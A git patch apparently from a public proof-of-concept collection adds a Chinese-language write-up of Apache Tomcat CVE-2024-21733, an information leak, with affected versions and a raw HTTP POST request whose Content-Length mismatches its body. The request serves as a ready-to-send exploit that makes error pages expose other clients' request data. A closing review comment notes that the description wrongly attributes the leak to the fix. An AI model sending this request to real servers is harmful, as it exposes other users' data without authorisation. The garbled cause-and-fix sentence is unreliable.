From 2e13e83ff6f380cae7b36d9942fc921bc614451d Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 1 Feb 2024 13:52:11 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Apache=20Tomcat=E5=AD=98=E5=9C=A8?= =?UTF-8?q?=E4=BF=A1=E6=81=AF=E6=B3=84=E9=9C=B2=E6=BC=8F=E6=B4=9E(=20CVE-2?= =?UTF-8?q?024-21733).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Tomcat存在信息泄露漏洞( CVE-2024-21733).md | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 Apache Tomcat存在信息泄露漏洞( CVE-2024-21733).md diff --git a/Apache Tomcat存在信息泄露漏洞( CVE-2024-21733).md b/Apache Tomcat存在信息泄露漏洞( CVE-2024-21733).md new file mode 100644 index 0000000..b4a6dbd --- /dev/null +++ b/Apache Tomcat存在信息泄露漏洞( CVE-2024-21733).md 
@@ -0,0 +1,38 @@ +## Apache Tomcat存在信息泄露漏洞( CVE-2024-21733) + +2024年1月25日公司监测到Apache Tomcat 信息泄露漏洞(CVE-2024-21733)情报。Apache Tomcat 是一个开源 Java Servlet 容器和 Web 服务器,用于运行 Java 应用程序和动态网页。Coyote 是 Tomcat 的连接器,处理来自客户端的请求并将它们传递Tomcat 引擎进行处理。攻击者可以通过构造特定请求,在异常页面中输出其他请求的body 数据,修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态,从而造成信息泄露。 + + +## 影响版本 +``` +从8.5.7到8.5.63 +9.0.0-M11到9.0.43 +``` + + +## poc +``` +POST / HTTP/1.1 +Host: hostname +Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Linux" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Priority: u=0, i +Connection: keep-alive +Content-Length: 6 +Content-Type: application/x-www-form-urlencoded + +X +``` + +![image](https://github.com/wy876/POC/assets/139549762/15933e83-bb51-4d91-ba49-c31ab8d27cdb) +
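Review bot: The last clause of the description paragraph attaches the information leak to the fix rather than to the bug: "修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态,从而造成信息泄露" reads as if the finally block causes the leak. Split it into two sentences, one stating the cause (buffer position/limit left inconsistent after an exception, so another request's body can appear in the error page) and one stating the fix, and add the fixed Tomcat versions next to the "影响版本" list so a reader knows where to upgrade to. The "影响版本" and "poc" fences carry no language tag; tag the request block as ```http so it renders as a request rather than plain text. The PoC declares Content-Length: 6 but sends a one-byte body, and the only statement of what the server returns is the screenshot link at the end; add a sentence describing the expected error-page response so the result is verifiable without the image, and note that an unexpected body fragment in a 4xx/5xx error page is the observable a defender can look for in logs or a WAF.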